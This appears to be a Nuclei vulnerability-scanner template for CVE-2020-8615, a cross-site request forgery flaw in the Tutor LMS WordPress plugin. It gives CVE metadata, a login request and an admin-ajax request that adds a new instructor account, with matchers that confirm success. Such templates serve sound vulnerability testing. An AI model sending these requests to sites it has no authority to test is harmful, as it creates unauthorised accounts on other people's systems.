daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2020/CVE-2020-8615.yaml

61 lines
2.5 KiB
YAML
Raw Blame History

id: CVE-2020-8615
info:
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
author: r3Y3r53
severity: medium
description: |
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
remediation: update to v.1.5.3
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
- https://wpscan.com/vulnerability/10058
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
- https://wpvulndb.com/vulnerabilities/10058
- https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2020-8615
cwe-id: CWE-352
epss-score: 0.00479
epss-percentile: 0.73233
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: themeum
product: tutor_lms
framework: wordpress
publicwww-query: /wp-content/plugins/tutor/
tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
- 'status_code_2 == 200'
condition: and
# digest: 490a0046304402203e0ac8881fdd2afe0cb2d8573ad692bf9e23f6c12fd5e3140bf583b6f4e32a390220415f834ab6c4d852cbedeafd52ffb665d1298f98aff86452b3e512379198fa60:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink